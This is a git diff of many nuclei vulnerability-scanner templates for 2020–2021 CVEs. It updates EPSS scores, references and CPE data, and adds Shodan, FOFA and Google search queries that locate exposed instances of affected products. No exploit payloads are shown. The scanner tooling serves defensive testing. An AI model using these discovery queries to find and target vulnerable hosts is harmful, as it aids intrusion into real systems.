b/http/cves/2020/CVE-2020-5410.yaml index 7154278d76..355108be0b 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-5410 - cwe-id: CWE-22,CWE-23 - epss-score: 0.96876 - epss-percentile: 0.99649 + cwe-id: CWE-23,CWE-22 + epss-score: 0.97175 + epss-percentile: 0.99813 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 0d65e91ace..9398930aac 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5777 cwe-id: CWE-287 - epss-score: 0.04038 - epss-percentile: 0.91885 + epss-score: 0.05608 + epss-percentile: 0.93255 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index daa7652cd1..54a16b4abc 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -34,6 +34,9 @@ info: max-request: 8 vendor: f5 product: big-ip_access_policy_manager + shodan-query: http.title:"big-ip®-+redirect" +"server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2020,bigip,rce,kev,packetstorm,f5 http: diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index e8aeb8c584..0ac3638945 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -13,13 +13,15 @@ info: reference: - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/ - https://nvd.nist.gov/vuln/detail/CVE-2020-6171 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-6171 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48556 + epss-percentile: 0.48718 cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 74d1a8004d..eca65ab4a1 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-6207 cwe-id: CWE-306 - epss-score: 0.97437 - epss-percentile: 0.99941 + epss-score: 0.97439 + epss-percentile: 0.99945 cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index 3e57175d56..1b9566f020 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2020-6287 cwe-id: CWE-306 epss-score: 0.97502 - epss-percentile: 0.99977 + epss-percentile: 0.99982 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 + fofa-query: icon_hash=-266008933 tags: cve,cve2020,sap,kev http: diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index af793bcf11..84b58f246b 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2020-6637 cwe-id: CWE-89 epss-score: 0.02067 - epss-percentile: 0.87871 + epss-percentile: 0.89008 cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* metadata: max-request: 3 vendor: os4ed product: opensis shodan-query: http.title:"openSIS" + fofa-query: title="opensis" + google-query: intitle:"opensis" tags: cve,cve2020,sqli,opensis,os4ed http: diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index 177d7834d0..546a4901c2 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-6950 cwe-id: CWE-22 epss-score: 0.03924 - epss-percentile: 0.91792 + epss-percentile: 0.91979 cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index c526b5ecea..fed8d4aa02 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-7107 cwe-id: CWE-79 epss-score: 0.00395 - epss-percentile: 0.70653 + epss-percentile: 0.73354 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: product: ultimate_faq framework: wordpress tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index 21ef231eb1..e74fa6b18e 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-7136 cwe-id: CWE-288 epss-score: 0.26929 - epss-percentile: 0.96662 + epss-percentile: 0.96763 cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index fb7d0c80d6..0caa7b0e98 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -16,13 +16,17 @@ info: Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability. reference: - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates + - https://github.com/merlinepedra/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.3 cve-id: CVE-2020-7318 cwe-id: CWE-79 epss-score: 0.00065 - epss-percentile: 0.26966 + epss-percentile: 0.28395 cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 19062c1aa3..67780e7931 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: synacor product: zimbra_collaboration_suite + shodan-query: http.title:"zimbra collaboration suite" + fofa-query: title="zimbra web client sign in" + google-query: intitle:"zimbra collaboration suite" tags: cve,cve2020,zimbra,ssrf,oast,synacor http: diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index c2bedd5d86..f731983123 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -14,13 +14,14 @@ info: - https://tickets.puppetlabs.com/browse/PDB-4876 - https://puppet.com/security/cve/CVE-2020-7943/ - https://nvd.nist.gov/vuln/detail/CVE-2020-7943 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-7943 cwe-id: CWE-276,NVD-CWE-noinfo - epss-score: 0.08068 - epss-percentile: 0.93691 + epss-score: 0.06791 + epss-percentile: 0.93863 cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 0258e2200a..f125c68bcf 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -25,6 +25,8 @@ info: max-request: 2 vendor: liferay product: liferay_portal + shodan-query: http.favicon.hash:129457226 + fofa-query: icon_hash=129457226 tags: cve2020,cve,packetstorm,rce,liferay,kev http: diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index b3a656ea66..758004ac96 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7980 cwe-id: CWE-78 - epss-score: 0.97015 - epss-percentile: 0.99726 + epss-score: 0.96876 + epss-percentile: 0.99703 cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelliantech product: aptus_web shodan-query: http.title:"Intellian Aptus Web" + fofa-query: title="intellian aptus web" + google-query: intitle:"intellian aptus web" tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech http: diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 96f7c732a6..c5e4150a32 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-8115 cwe-id: CWE-79 epss-score: 0.0187 - epss-percentile: 0.88123 + epss-percentile: 0.88393 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: revive-adserver product: revive_adserver + shodan-query: http.title:"revive adserver" + fofa-query: icon_hash=106844876 + google-query: intitle:"revive adserver" tags: cve,cve2020,xss,hackerone,revive-adserver http: diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index e8c990527b..9a73648b69 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: rubyonrails product: rails + shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" tags: cve,cve2020,rails,rce,hackerone,rubyonrails http: diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 30301b6637..ea8b81d24a 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-8191 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58959 + epss-percentile: 0.58946 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index c078c67e14..693f102373 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8193 cwe-id: CWE-287,CWE-284 epss-score: 0.97463 - epss-percentile: 0.99954 + epss-percentile: 0.99959 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index a1efe7d7c3..78f9a297ff 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: artica product: pandora_fms + shodan-query: http.title:"pandora fms" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: cve,cve2020,fms,artica http: diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 27c1e82540..c67bd036a0 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2020-8512 cwe-id: CWE-79 epss-score: 0.00692 - epss-percentile: 0.79726 + epss-percentile: 0.80113 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: icewarp product: icewarp_server shodan-query: title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve,cve2020,edb,packetstorm,xss,icewarp http: diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 997d47895e..fe8f69eb47 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-8515 cwe-id: CWE-78 epss-score: 0.97079 - epss-percentile: 0.99754 + epss-percentile: 0.9977 cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index 573c41bdc3..0c2c04062a 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8615 cwe-id: CWE-352 - epss-score: 0.00632 - epss-percentile: 0.78607 + epss-score: 0.00867 + epss-percentile: 0.82331 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: product: tutor_lms framework: wordpress publicwww-query: /wp-content/plugins/tutor/ + shodan-query: http.html:/wp-content/plugins/tutor/ + fofa-query: body=/wp-content/plugins/tutor/ tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum variables: user: "{{rand_base(6)}}" diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index c1c47265b2..d8934eccdd 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8641 cwe-id: CWE-22 epss-score: 0.0071 - epss-percentile: 0.80028 + epss-percentile: 0.8041 cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index aae9417521..692a91b3ba 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8644 cwe-id: CWE-94 - epss-score: 0.96028 - epss-percentile: 0.99356 + epss-score: 0.95356 + epss-percentile: 0.99358 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index beccc40018..d3fe2585a3 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8772 cwe-id: CWE-862 - epss-score: 0.96607 - epss-percentile: 0.99546 + epss-score: 0.96539 + epss-percentile: 0.99607 cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 350f1d2f4a..0d93a8033b 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: cacti product: cacti + fofa-query: icon_hash="-1797138069" + shodan-query: http.title:"login to cacti" + google-query: intitle:"cacti" tags: cve2020,cve,cacti,rce,oast http: diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index f197283c31..52d610be30 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-8982 cwe-id: CWE-22 - epss-score: 0.76583 - epss-percentile: 0.98117 + epss-score: 0.79607 + epss-percentile: 0.98287 cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index bc381a20e9..e9fb42ee7c 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: jeedom product: jeedom + shodan-query: http.title:"jeedom" + fofa-query: title="jeedom" + google-query: intitle:"jeedom" tags: cve,cve2020,xss,jeedom http: diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index fcf09f4aa9..fb637190fc 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -28,6 +28,7 @@ info: max-request: 2 vendor: oracle product: iplanet_web_server + shodan-query: cpe:"cpe:2.3:a:oracle:iplanet_web_server" tags: cve,cve2020,oracle,auth-bypass,iplanet http: diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 5c83dfa413..0dcf44ad65 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-9344 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.5782 + epss-percentile: 0.58449 cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 52ddadead7..3d3deabe88 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2020-9376 cwe-id: CWE-74 epss-score: 0.96966 - epss-percentile: 0.99713 + epss-percentile: 0.99728 cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 185e443c13..7e9f9b1250 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: djangoproject product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: cve,cve2020,django,sqli,vulhub,djangoproject http: diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index fe00dd8dd6..2251099cdf 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -13,18 +13,23 @@ info: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 - https://nvd.nist.gov/vuln/detail/CVE-2020-9425 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-9425 cwe-id: CWE-670 - epss-score: 0.01611 - epss-percentile: 0.86058 + epss-score: 0.01336 + epss-percentile: 0.86037 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig.exposure,rconfig http: diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index 41eb900045..aca7c1bf66 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -34,6 +34,8 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2020,cve,rce,packetstorm,apache,tomcat http: diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index 1caba30088..e838f0fbae 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: apache product: ofbiz + fofa-query: body="ofbiz" + shodan-query: http.html:"ofbiz" tags: cve,cve2020,ofbiz,packetstorm,apache,java http: diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 125ff6c462..ad125e7bf5 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: craftcms product: craft_cms + publicwww-query: craftcms + shodan-query: cpe:"cpe:2.3:a:craftcms:craft_cms" + fofa-query: icon_hash=-47932290 tags: cve,cve2020,ssti,craftcms http: diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index 83948913f4..7321ccb97d 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -30,6 +30,7 @@ info: vendor: cisco product: rv160_firmware shodan-query: http.html:"Cisco rv340" + fofa-query: body="cisco rv340" tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive http: diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 7754f96f7e..554939b13c 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1498 cwe-id: CWE-78 - epss-score: 0.97512 - epss-percentile: 0.99982 + epss-score: 0.97528 + epss-percentile: 0.99991 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 5747bbb194..8665fa807e 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -20,13 +20,13 @@ info: cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 - epss-score: 0.9652 - epss-percentile: 0.99578 - cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* + epss-score: 0.96279 + epss-percentile: 0.99533 + cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco - product: hyperflex_hx_data_platform + product: hyperflex_hx220c_af_m5 tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco http: diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index 319723fd21..a8b57a3ffb 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -18,13 +18,13 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20031 cwe-id: CWE-601 - epss-score: 0.01202 - epss-percentile: 0.84903 - cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* + epss-score: 0.01452 + epss-percentile: 0.86646 + cpe: cpe:2.3:h:sonicwall:nsa_2650:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sonicwall - product: sonicos + product: nsa_2650 google-query: inurl:"auth.html" intitle:"SonicWall" tags: cve,cve2021,sonicwall,redirect,edb,packetstorm diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index 2cb5cdf9c7..722d97199c 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -15,17 +15,18 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-20091 epss-score: 0.00928 - epss-percentile: 0.81222 - cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.8296 + cpe: cpe:2.3:h:buffalo:wsr-2533dhpl2-bk:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: buffalo - product: wsr-2533dhpl2-bk_firmware + product: wsr-2533dhpl2-bk tags: cve2021,cve,buffalo,firmware,iot,tenable http: diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index ea8467ee9f..6aa7cb7021 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20114 cwe-id: CWE-425 - epss-score: 0.01409 - epss-percentile: 0.86167 + epss-score: 0.01028 + epss-percentile: 0.83792 cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 521afdd869..071484bb54 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20123 cwe-id: CWE-22 - epss-score: 0.03354 - epss-percentile: 0.91162 + epss-score: 0.02276 + epss-percentile: 0.89622 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: draytek product: vigorconnect shodan-query: http.html:"VigorConnect" + fofa-query: body="vigorconnect" tags: cve2021,cve,draytek,lfi,vigorconnect,tenable http: diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 30bd740de0..28248f1a86 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20124 cwe-id: CWE-22 - epss-score: 0.01331 - epss-percentile: 0.85744 + epss-score: 0.01224 + epss-percentile: 0.85337 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: draytek product: vigorconnect shodan-query: http.html:"VigorConnect" + fofa-query: body="vigorconnect" tags: cve2021,cve,draytek,lfi,vigorconnect,tenable http: diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 48573f859d..1f81232d74 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -19,13 +19,13 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20137 cwe-id: CWE-79 - epss-score: 0.24456 - epss-percentile: 0.96515 - cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:* + epss-score: 0.23391 + epss-percentile: 0.96553 + cpe: cpe:2.3:h:gryphonconnect:gryphon_tower:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gryphonconnect - product: gryphon_tower_firmware + product: gryphon_tower tags: cve2021,cve,xss,tenable,gryphon,gryphonconnect http: diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index c0f5c920cf..3ae73bde55 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -25,6 +25,7 @@ info: vendor: trendnet product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" + fofa-query: body="tew-827dru" tags: cve2021,cve,disclosure,router,tenable,trendnet http: diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index 41df85c9ff..c9eb02de23 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -25,6 +25,7 @@ info: vendor: trendnet product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" + fofa-query: body="tew-827dru" tags: 